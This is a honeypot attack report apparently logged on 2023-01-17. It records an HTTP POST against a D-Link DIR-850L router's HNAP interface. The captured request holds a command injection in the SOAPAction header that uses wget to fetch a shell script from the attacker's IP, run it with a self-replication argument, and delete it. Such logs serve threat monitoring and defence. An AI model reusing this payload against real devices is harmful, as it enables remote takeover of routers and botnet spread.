Attack Report for Detail

Header

Time

2023/01/17, 01:02:22 (GMT)

Transaction ID

Q1MG758Z87243G74

Service

http

Location

BG (Bulgaria)

Attacker

45.12.253.180

Classification

D-link overflow

Harm Potential

High

Description

D-Link DIR-850L web admin interface contains a stack-based buffer overflow vulnerability

Content

POST /HNAP1/ HTTP/1.1
Host: 46.4.222.114:80
User-Agent: Mozila/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
SOAPAction: "http://purenetworks.com/HNAP1/GetDeviceSettings/`cd && cd tmp && export PATH=$PATH:. && cd /tmp;wget http://45.12.253.180/a/wwgget.sh;chmod 777 wwgget.sh;sh wwgget.sh selfrep.dlink;rm -rf wwgget.sh`"
Content-Length: 0

All details are coming from honeypot central database.

Please share your wishes, opinions and suggestions with us:

If you like, you can support
with your donations to us..

Donate